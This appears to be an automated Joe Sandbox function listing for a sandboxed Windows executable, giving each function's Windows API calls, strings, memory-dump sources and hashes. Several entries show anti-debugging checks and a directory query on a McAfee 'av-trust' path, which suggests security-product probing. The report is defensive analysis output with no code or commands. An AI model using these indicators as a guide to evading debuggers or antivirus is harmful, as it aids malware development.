                                • Opcode Fuzzy Hash: e369764306d7ec5fcce8cb91f22b9e0fe9f0b5e0e7d819f7a3608364a3440ffe
                                • Instruction Fuzzy Hash: 6022D570E00259CBEB14CF64DD45B9DBBB1AF45304F1082AED409AB3D1DBB95A88CF5A
                                Function 003EA720 Relevance: 23.1, APIs: 10, Strings: 3, Instructions: 395memorythreadCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 003F4E70: __Mtx_init_in_situ.LIBCPMT ref: 003F4ECC
                                • SysAllocStringLen.OLEAUT32(00000000,?), ref: 003EA7D4
                                • GetCurrentThreadId.KERNEL32 ref: 003EA8B2
                                • SysFreeString.OLEAUT32(?), ref: 003EA8F1
                                • SysFreeString.OLEAUT32(?), ref: 003EA8FE
                                • SysFreeString.OLEAUT32(?), ref: 003EA90B
                                • SysAllocStringLen.OLEAUT32(00000000,?), ref: 003EAB12
                                  • Part of subcall function 003FFE90: QueryUnbiasedInterruptTimePrecise.KERNELBASE ref: 003FFEFD
                                  • Part of subcall function 003E7C00: SysAllocStringLen.OLEAUT32(00000000,00000014), ref: 003E7C16
                                • GetCurrentThreadId.KERNEL32 ref: 003EABD9
                                • SysFreeString.OLEAUT32(?), ref: 003EAC18
                                • SysFreeString.OLEAUT32(?), ref: 003EAC25
                                • SysFreeString.OLEAUT32(?), ref: 003EAC32
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: String$Free$Alloc$CurrentThread$InterruptMtx_init_in_situPreciseQueryTimeUnbiased
                                • String ID: dummy$publish$set setting
                                • API String ID: 2464836827-992586687
                                • Opcode ID: cb84abc3007cf75167627df21fe3a557215f32e0addce101a58d224d4a3c15af
                                • Instruction ID: 4c31ebbe5164b97b9aded68bd8efabc163093345bd8e531f3ed4a7f831b1374c
                                • Opcode Fuzzy Hash: cb84abc3007cf75167627df21fe3a557215f32e0addce101a58d224d4a3c15af
                                • Instruction Fuzzy Hash: 4BF14B74E002689FDB11DFA9D945B9EBBF4BF48300F1042AAE809AB381DB74AD44CF51
                                Function 004351C8 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: __floor_pentium4
                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                • API String ID: 4168288129-2761157908
                                • Opcode ID: 1c06e3e76cfb86a2d3bf3c2f51d39fee2ae069990c49878135c4ee9f301804de
                                • Instruction ID: 6a3e3af5a8343fc181485e235d63693ca0ad382d1900c06edb468acef706dde2
                                • Opcode Fuzzy Hash: 1c06e3e76cfb86a2d3bf3c2f51d39fee2ae069990c49878135c4ee9f301804de
                                • Instruction Fuzzy Hash: E5D24671E086299FDB25CE28DD407EAB7B5EB48305F1551EBD80DE3240EB38AE818F45
                                Function 003E40C0 Relevance: 7.7, APIs: 5, Instructions: 204memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,?), ref: 003E418A
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003E4191
                                • GetProcessHeap.KERNEL32(00000000), ref: 003E41A9
                                • GetProcessHeap.KERNEL32 ref: 003E41BA
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 003E41C4
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Heap$Process$AllocateFree
                                • String ID:
                                • API String ID: 576844849-0
                                • Opcode ID: 54f41ab77575d6a7d7e9ab1daafb62973049ae85692751143112babd5837e769
                                • Instruction ID: 98ea42b23bc606e2e7eb72582532de06d2e8e214526c32993522cf57841c8abf
                                • Opcode Fuzzy Hash: 54f41ab77575d6a7d7e9ab1daafb62973049ae85692751143112babd5837e769
                                • Instruction Fuzzy Hash: 4371B174A00656EFCF16CF26D840BA9BBB5FF49304F158268E9099B781D331ED55CB90
                                Function 00424DA6 Relevance: 7.6, APIs: 5, Instructions: 52COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • FindClose.KERNEL32(000000FF,?,00424DD5,0044D0B8,?,?,?,00404EBB,?,?,?,00000000,0044D0B8,00000001,A05DD77D), ref: 00424DB2
                                • FindFirstFileExW.KERNEL32(000000FF,00000001,A05DD77D,00000000,00000000,00000000,0044D0B8,?,0044D0B8,?,?,00424DD5,0044D0B8,?,?), ref: 00424DE2
                                • GetLastError.KERNEL32(?,?,00424DD5,0044D0B8,?,?,?,00404EBB,?,?,?,00000000,0044D0B8,00000001,A05DD77D), ref: 00424DEF
                                • FindFirstFileExW.KERNEL32(000000FF,00000000,A05DD77D,00000000,00000000,00000000,?,?,00424DD5,0044D0B8,?,?,?,00404EBB,?,?), ref: 00424E09
                                • GetLastError.KERNEL32(?,?,00424DD5,0044D0B8,?,?,?,00404EBB,?,?,?,00000000,0044D0B8,00000001,A05DD77D), ref: 00424E16
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Find$ErrorFileFirstLast$Close
                                • String ID:
                                • API String ID: 569926201-0
                                • Opcode ID: dc96b7a948804a6033a1f317271107757ea0bbc7c7394316982955a5bc7d8fda
                                • Instruction ID: 70354fddefb58ddecc33389a410f9501c96ddc104be17cafe4f3d42f4e8324ee
                                • Opcode Fuzzy Hash: dc96b7a948804a6033a1f317271107757ea0bbc7c7394316982955a5bc7d8fda
                                • Instruction Fuzzy Hash: A7019E35210164BBCB202FB6FC0CD5B3F79FFC2B20B50462AFA65851E0CB718861DA68
                                Function 00434D40 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 449COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID: tdC$tdC
                                • API String ID: 0-2609971967
                                • Opcode ID: 3c6720fed5e96a56802081afed2282991f16dd102909b62614c51dfe3dbb8ed7
                                • Instruction ID: 8baf5df189be52ffa19095fe4dddbf4b3d7016435fb02c062bf73e905c229ca4
                                • Opcode Fuzzy Hash: 3c6720fed5e96a56802081afed2282991f16dd102909b62614c51dfe3dbb8ed7
                                • Instruction Fuzzy Hash: 3EF15071E006199FDF14CFA9D880AAEF7B1FF88314F15926AE815A7380D735AD01CB94
                                Function 0041C012 Relevance: 6.6, APIs: 4, Instructions: 553memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32 ref: 0041C012
                                • LocalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,?,A05DD77D,00000000,?), ref: 0041C028
                                • LocalFree.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,?,A05DD77D,00000000,?), ref: 0041C17E
                                • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,?,A05DD77D,00000000,?), ref: 0041C1D9
                                • Concurrency::cancel_current_task.LIBCPMT ref: 0041C204
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorLastLocal$AllocConcurrency::cancel_current_taskFree
                                • String ID:
                                • API String ID: 926668463-0
                                • Opcode ID: 208a84c88c0f1730c638b45db1c17205a98904e9599fb2dacbb9fc88db93ab42
                                • Instruction ID: 962ba9e09d122791b40066764bfe7f98a7bbc60f6bc9c1e17e29aa9486b17a4d
                                • Opcode Fuzzy Hash: 208a84c88c0f1730c638b45db1c17205a98904e9599fb2dacbb9fc88db93ab42
                                • Instruction Fuzzy Hash: 35328CB1E002198FDB14CF68C9947EEFBB1BF49304F14816AD459A7381D738AA85CF99
                                Function 0043044A Relevance: 6.3, APIs: 4, Instructions: 337COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: _strrchr
                                • String ID:
                                • API String ID: 3213747228-0
                                • Opcode ID: 519a4bbb09685210bb18ff8d162f577835aa1f0a1d3ca9cd9c92e5198af6fdba
                                • Instruction ID: 6208f264bd96c960831a51a71cccac832441a3deddb1749bf7e63b3e2cb42d69
                                • Opcode Fuzzy Hash: 519a4bbb09685210bb18ff8d162f577835aa1f0a1d3ca9cd9c92e5198af6fdba
                                • Instruction Fuzzy Hash: 3BB135329002559FDB15CF28C8A1BEEBBA5EF5D314F14926BE815AB341D23CDD01CBA9
                                Function 00426602 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                Download Yara Rule
                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042660E
                                • IsDebuggerPresent.KERNEL32 ref: 004266DA
                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004266FA
                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00426704
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                • String ID:
                                • API String ID: 254469556-0
                                • Opcode ID: 99b749b4c23a0372566dcd9fd4dc845c2fb32dd57bf8318ca9f0ffeb8e337bf0
                                • Instruction ID: a82c3760a6ab8bfab62373b10b7095e37bda32351f50b1748f4796adc768ac66
                                • Opcode Fuzzy Hash: 99b749b4c23a0372566dcd9fd4dc845c2fb32dd57bf8318ca9f0ffeb8e337bf0
                                • Instruction Fuzzy Hash: C1312B75D4532C9BDB10DF64E989BCDBBB8AF08304F5040EAE50DAB250EB759A848F09
                                Function 00428FA3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042909B
                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 004290A5
                                • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 004290B2
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                • String ID:
                                • API String ID: 3906539128-0
                                • Opcode ID: b213717609e6658d44c948d36fca8b4756e98b17e9e7c5cca8b300ea6e1cc35b
                                • Instruction ID: 6b08f9915b07e0e8d52bad2dc6f3aa6ed3274d1294e6d9fca1ce475895b9ac51
                                • Opcode Fuzzy Hash: b213717609e6658d44c948d36fca8b4756e98b17e9e7c5cca8b300ea6e1cc35b
                                • Instruction Fuzzy Hash: E631C77494122C9BCB21DF29EC8978DBBB8BF08314F5041EAE51CA7251EB749F858F49
                                Function 0040A190 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 379nativethreadCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryInformationThread.NTDLL(?,?), ref: 0040A267
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: InformationQueryThread
                                • String ID: `F
                                • API String ID: 741662350-510860190
                                • Opcode ID: cad7c4a8a11764e7206483273463ae4e5f5c90f279c51f1d64dcac72bc62a2a6
                                • Instruction ID: 4f84e763385abcff93eebd2034bcd81d798d03b0a369463097fac9962f46e657
                                • Opcode Fuzzy Hash: cad7c4a8a11764e7206483273463ae4e5f5c90f279c51f1d64dcac72bc62a2a6
                                • Instruction Fuzzy Hash: 7A025B74A002288FDB25CF28C8547DABBB1BF4A304F0482EAD84DA7391DB755E95CF95
                                Function 00405AD0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 161filenativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryFullAttributesFile.NTDLL ref: 00405C00
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AttributesFileFullQuery
                                • String ID: `F
                                • API String ID: 3545844373-510860190
                                • Opcode ID: c82a591059207ad81dc77ec4763afcdd7b677faa4973f9135b0cbad2664510ae
                                • Instruction ID: 905df4a0714638a9d8b6f9dac6277ad69cf66fb1334f20b1e0a44fc1bfba48b1
                                • Opcode Fuzzy Hash: c82a591059207ad81dc77ec4763afcdd7b677faa4973f9135b0cbad2664510ae
                                • Instruction Fuzzy Hash: FD617EB1D047589BEB10CF54C8817EEBBB4FF49304F1441AAD909B7281EB78AA84CF95
                                Function 00405480 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 77filenativeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CreateFile
                                • String ID: `F
                                • API String ID: 823142352-510860190
                                • Opcode ID: 4b3d75baa8c419f0623ae27369b1416c4f4972b08d8faa6453aa77568c0e7ed9
                                • Instruction ID: a6a1c845347c42b30f96973a4b5f68b0bbc4dbfc89fcc592a5f9701a6fe9ad71
                                • Opcode Fuzzy Hash: 4b3d75baa8c419f0623ae27369b1416c4f4972b08d8faa6453aa77568c0e7ed9
                                • Instruction Fuzzy Hash: 22217CB1A14619AFDB00CF59DC45BAEFBF8FB49714F10822AE814E7780D7B969048BD4
                                Function 00402520 Relevance: 3.1, APIs: 2, Instructions: 133filenativeCOMMON
                                Download Yara Rule
                                APIs
                                • Concurrency::cancel_current_task.LIBCPMT ref: 00402601
                                • NtQueryDirectoryFile.NTDLL(?,00000000,00000010,?,?,?,0040D019,00468C5C,McAfee\WPS\content\av-trust), ref: 00402677
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Concurrency::cancel_current_taskDirectoryFileQuery
                                • String ID:
                                • API String ID: 2349893733-0
                                • Opcode ID: 0aa61cfe8a2fd82bd45026e3b44ea01a353ca5e6defede7d5e0b7771f3216629
                                • Instruction ID: 2a90b5cf591512a5cdeba4c26a754da4f3268bd0b7b4320af399ed805259977d
                                • Opcode Fuzzy Hash: 0aa61cfe8a2fd82bd45026e3b44ea01a353ca5e6defede7d5e0b7771f3216629
                                • Instruction Fuzzy Hash: CA41B472600208AFDB14CF68DD55A9ABBE8FB49310F10063EF916D7390D7B6A954CB94
                                Function 00405F60 Relevance: 3.1, APIs: 2, Instructions: 80COMMON
                                Download Yara Rule
                                APIs
                                • DeviceIoControl.KERNEL32(0040C674,000900EB,00000000,00000000,?,00000250,?,00000000), ref: 00405FCB
                                • GetLastError.KERNEL32 ref: 00406021
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ControlDeviceErrorLast
                                • String ID:
                                • API String ID: 2645620995-0
                                • Opcode ID: 04e641ec1fb86140a7d1631f186cff32dec831f1eaf7a8a8b476e896b9aa59fa
                                • Instruction ID: 481f0870b27d6d286ceff04ecec3c3b188e6e4ea812a3fd8afbe570dae2f5b2e
                                • Opcode Fuzzy Hash: 04e641ec1fb86140a7d1631f186cff32dec831f1eaf7a8a8b476e896b9aa59fa
                                • Instruction Fuzzy Hash: 203152B4A052089FDB10DF64DC49BAEB7F4AB08304F5041AEE915A7381DB75AE44CF99
